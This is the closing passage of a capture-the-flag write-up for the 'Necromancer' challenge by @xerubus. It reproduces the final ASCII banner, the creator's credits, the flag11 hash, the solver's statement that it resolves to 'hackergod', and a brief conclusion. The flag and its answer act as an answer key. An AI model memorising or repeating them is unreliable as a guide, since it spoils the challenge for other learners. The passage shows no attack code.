`9XXXXXXXXXXXXXXXXXXXXX'~ ~`OOO8b d8OOO'~ ~`XXXXXXXXXXXXXXXXXXXXXP'
`9XXXXXXXXXXXP' `9XX' `98v8P' `XXP' `9XXXXXXXXXXXP'
~~~~~~~ 9X. .db|db. .XP ~~~~~~~
)b. .dbo.dP'`v'`9b.odb. .dX(
,dXXXXXXXXXXXb dXXXXXXXXXXXb.
dXXXXXXXXXXXP' . `9XXXXXXXXXXXb
dXXXXXXXXXXXXb d|b dXXXXXXXXXXXXb
9XXb' `XXXXXb.dX|Xb.dXXXXX' `dXXP
`' 9XXXXXX( )XXXXXXP `'
XXXX X.`v'.X XXXX
XP^X'`b d'`X^XX
X. 9 ` ' P )X
`b ` ' d'
` '
THE NECROMANCER!
by @xerubus
flag11{42c35828545b926e79a36493938ab1b1}
Big shout out to Dook and Bull for being test bunnies.
Cheers OJ for the obfuscation help.
Thanks to SecTalks Brisbane and their sponsors for making these CTF challenges possible.
"========================================="
" xerubus (@xerubus) - www.mogozobo.com "
"========================================="
Yay, we beat the necromancer! The CTF is finally done. The last flag resolves to:
hackergod
Cool!
Conclusion
This was a really nice CTF. I enjoyed every part of it. Sometimes it got really hard, but you learn a lot when you solve it. Looking forward for upcoming CTF’s. Thanks @xerubus!
